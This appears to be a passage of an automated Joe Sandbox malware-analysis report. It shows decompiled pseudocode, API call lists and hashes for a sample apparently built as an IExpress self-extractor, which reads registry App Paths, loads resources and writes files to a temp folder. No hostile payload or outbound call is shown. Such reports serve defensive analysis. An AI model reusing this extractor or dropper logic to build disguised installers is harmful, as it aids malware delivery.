                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A92A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A92A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x00a928f1
                                                                                                                                                                                                                                            0x00a928f4
                                                                                                                                                                                                                                            0x00a928f7
                                                                                                                                                                                                                                            0x00a928f9
                                                                                                                                                                                                                                            0x00a928fc
                                                                                                                                                                                                                                            0x00a928ff
                                                                                                                                                                                                                                            0x00a92901
                                                                                                                                                                                                                                            0x00a92907
                                                                                                                                                                                                                                            0x00a92a62
                                                                                                                                                                                                                                            0x00a92a64
                                                                                                                                                                                                                                            0x00a9290d
                                                                                                                                                                                                                                            0x00a9290d
                                                                                                                                                                                                                                            0x00a9290f
                                                                                                                                                                                                                                            0x00a92912
                                                                                                                                                                                                                                            0x00a92920
                                                                                                                                                                                                                                            0x00a92937
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92944
                                                                                                                                                                                                                                            0x00a9294a
                                                                                                                                                                                                                                            0x00a9294f
                                                                                                                                                                                                                                            0x00a92a2f
                                                                                                                                                                                                                                            0x00a92a32
                                                                                                                                                                                                                                            0x00a92a34
                                                                                                                                                                                                                                            0x00a92a37
                                                                                                                                                                                                                                            0x00a92a41
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92955
                                                                                                                                                                                                                                            0x00a9295e
                                                                                                                                                                                                                                            0x00a92962
                                                                                                                                                                                                                                            0x00a92969
                                                                                                                                                                                                                                            0x00a9296f
                                                                                                                                                                                                                                            0x00a92974
                                                                                                                                                                                                                                            0x00a9298c
                                                                                                                                                                                                                                            0x00a92a20
                                                                                                                                                                                                                                            0x00a92a21
                                                                                                                                                                                                                                            0x00a92a27
                                                                                                                                                                                                                                            0x00a92a4c
                                                                                                                                                                                                                                            0x00a92a4f
                                                                                                                                                                                                                                            0x00a92a50
                                                                                                                                                                                                                                            0x00a92a53
                                                                                                                                                                                                                                            0x00a92a56
                                                                                                                                                                                                                                            0x00a92a5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a929b2
                                                                                                                                                                                                                                            0x00a929b2
                                                                                                                                                                                                                                            0x00a929b5
                                                                                                                                                                                                                                            0x00a929bd
                                                                                                                                                                                                                                            0x00a929c3
                                                                                                                                                                                                                                            0x00a929cc
                                                                                                                                                                                                                                            0x00a929d5
                                                                                                                                                                                                                                            0x00a929d7
                                                                                                                                                                                                                                            0x00a929da
                                                                                                                                                                                                                                            0x00a929dd
                                                                                                                                                                                                                                            0x00a929df
                                                                                                                                                                                                                                            0x00a929ec
                                                                                                                                                                                                                                            0x00a929f8
                                                                                                                                                                                                                                            0x00a929fc
                                                                                                                                                                                                                                            0x00a929ff
                                                                                                                                                                                                                                            0x00a92a02
                                                                                                                                                                                                                                            0x00a92a07
                                                                                                                                                                                                                                            0x00a92a0a
                                                                                                                                                                                                                                            0x00a92a0f
                                                                                                                                                                                                                                            0x00a92a19
                                                                                                                                                                                                                                            0x00a92a81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92a0f
                                                                                                                                                                                                                                            0x00a9298c
                                                                                                                                                                                                                                            0x00a92974
                                                                                                                                                                                                                                            0x00a92962
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9294f
                                                                                                                                                                                                                                            0x00a92912
                                                                                                                                                                                                                                            0x00a92a65
                                                                                                                                                                                                                                            0x00a92a68
                                                                                                                                                                                                                                            0x00a92a6c
                                                                                                                                                                                                                                            0x00a92a6f
                                                                                                                                                                                                                                            0x00a92a6f
                                                                                                                                                                                                                                            0x00a92a7d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00A92A6F
                                                                                                                                                                                                                                              • Part of subcall function 00A92773: CharUpperA.USER32(306EBEDF,00000000,00000000,00000000), ref: 00A927A8
                                                                                                                                                                                                                                              • Part of subcall function 00A92773: CharNextA.USER32(0000054D), ref: 00A927B5
                                                                                                                                                                                                                                              • Part of subcall function 00A92773: CharNextA.USER32(00000000), ref: 00A927BC
                                                                                                                                                                                                                                              • Part of subcall function 00A92773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92829
                                                                                                                                                                                                                                              • Part of subcall function 00A92773: RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92852
                                                                                                                                                                                                                                              • Part of subcall function 00A92773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92870
                                                                                                                                                                                                                                              • Part of subcall function 00A92773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A928A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A93938,?,?,?,?,-00000005), ref: 00A92958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00A92969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A93938,?,?,?,?,-00000005,?), ref: 00A92A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A92A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: c5b59f4f7ef3d8edd321a8132c5ad63f595662c03cafe54904a88e3e4175a1d8
                                                                                                                                                                                                                                            • Instruction ID: 183369cd977eeb86233fc5e9757b62452ac8491e2d96eecb4cb0efee83dfb3be
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5b59f4f7ef3d8edd321a8132c5ad63f595662c03cafe54904a88e3e4175a1d8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4512932E00219EFCF25DF98C884AAEBBF5FF48740F14402AE905E7611DB319941DB94
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E00A94169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E00A9468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E00A9468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E00A944B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a9417d
                                                                                                                                                                                                                                            0x00a9418f
                                                                                                                                                                                                                                            0x00a94193
                                                                                                                                                                                                                                            0x00a941b7
                                                                                                                                                                                                                                            0x00a941d3
                                                                                                                                                                                                                                            0x00a941e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a941e7
                                                                                                                                                                                                                                            0x00a941d5
                                                                                                                                                                                                                                            0x00a941d6
                                                                                                                                                                                                                                            0x00a941d8
                                                                                                                                                                                                                                            0x00a941d9
                                                                                                                                                                                                                                            0x00a941da
                                                                                                                                                                                                                                            0x00a941df
                                                                                                                                                                                                                                            0x00a941e1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a941e1
                                                                                                                                                                                                                                            0x00a941b9
                                                                                                                                                                                                                                            0x00a941ba
                                                                                                                                                                                                                                            0x00a941bc
                                                                                                                                                                                                                                            0x00a941bd
                                                                                                                                                                                                                                            0x00a941be
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a941be
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A930B4), ref: 00A94189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A930B4), ref: 00A941E7
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: 567571897348407577999125f371dc9a00625896e50456c1d1de2523632b381b
                                                                                                                                                                                                                                            • Instruction ID: 0edb4416e5e549c10dd7bbfeaa1db75c8a22cbd8b44b71cce5e6dddb1c092763
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 567571897348407577999125f371dc9a00625896e50456c1d1de2523632b381b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA01FFF53002243BFF2427A94C86F7B21DEDBE9795F204226B706E62809EA8CC0341B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E00A943D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa99a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a919e0
                                                                                                                                                                                                                                            0x00a919e0
                                                                                                                                                                                                                                            0x00a919eb
                                                                                                                                                                                                                                            0x00a919f2
                                                                                                                                                                                                                                            0x00a919f9
                                                                                                                                                                                                                                            0x00a919fc
                                                                                                                                                                                                                                            0x00a91a01
                                                                                                                                                                                                                                            0x00a91a2a
                                                                                                                                                                                                                                            0x00a91a2e
                                                                                                                                                                                                                                            0x00a91a3e
                                                                                                                                                                                                                                            0x00a91a4f
                                                                                                                                                                                                                                            0x00a91a62
                                                                                                                                                                                                                                            0x00a91a6a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91a03
                                                                                                                                                                                                                                            0x00a91a06
                                                                                                                                                                                                                                            0x00a91a20
                                                                                                                                                                                                                                            0x00a91a20
                                                                                                                                                                                                                                            0x00a91a08
                                                                                                                                                                                                                                            0x00a91a08
                                                                                                                                                                                                                                            0x00a91a14
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91a16
                                                                                                                                                                                                                                            0x00a91a18
                                                                                                                                                                                                                                            0x00a91a70
                                                                                                                                                                                                                                            0x00a91a72
                                                                                                                                                                                                                                            0x00a91a72
                                                                                                                                                                                                                                            0x00a91a14
                                                                                                                                                                                                                                            0x00a91a06
                                                                                                                                                                                                                                            0x00a91a81

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A91A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A91A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00A91A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A91A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00A91A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: bad9e26e15d343a9c6fe89d8391c3427c133fd938cb18485e38216a3abf0e0db
                                                                                                                                                                                                                                            • Instruction ID: 28ffb22c877db83ba57deb731e0f5f80cf3484d4beced83219d93ea509f980bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad9e26e15d343a9c6fe89d8391c3427c133fd938cb18485e38216a3abf0e0db
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6511A53170110AAFDF10EFA4DE08AAE77F8EF59340F204256F51296590DE349E02CB95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A97155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0xa98004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa98004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0xa98008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a9715d
                                                                                                                                                                                                                                            0x00a97161
                                                                                                                                                                                                                                            0x00a97165
                                                                                                                                                                                                                                            0x00a97178
                                                                                                                                                                                                                                            0x00a97182
                                                                                                                                                                                                                                            0x00a9718e
                                                                                                                                                                                                                                            0x00a97197
                                                                                                                                                                                                                                            0x00a971a0
                                                                                                                                                                                                                                            0x00a971b1
                                                                                                                                                                                                                                            0x00a971b8
                                                                                                                                                                                                                                            0x00a971c4
                                                                                                                                                                                                                                            0x00a971c7
                                                                                                                                                                                                                                            0x00a971cb
                                                                                                                                                                                                                                            0x00a971d5
                                                                                                                                                                                                                                            0x00a971da
                                                                                                                                                                                                                                            0x00a971da
                                                                                                                                                                                                                                            0x00a971dc
                                                                                                                                                                                                                                            0x00a971dc
                                                                                                                                                                                                                                            0x00a971e2
                                                                                                                                                                                                                                            0x00a971e5
                                                                                                                                                                                                                                            0x00a971ee

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00A97191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A9719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A971A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00A971B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 86ad4832ba5cf7aa719bfd1f16ea2774eba14b4f63d3dfe5fa5624dd8438d014
                                                                                                                                                                                                                                            • Instruction ID: 345ffb8053f74a794aa4547418fbdcadd40a05daa9d3b83ef322a0290faf71ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86ad4832ba5cf7aa719bfd1f16ea2774eba14b4f63d3dfe5fa5624dd8438d014
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52113A71E11208DBCF10DFF8DA48A9EB7F4EF18314F614A57D806E7220EA349A05CB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E00A963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E00A91781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            				E00A9658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0xa99124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0xa99124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
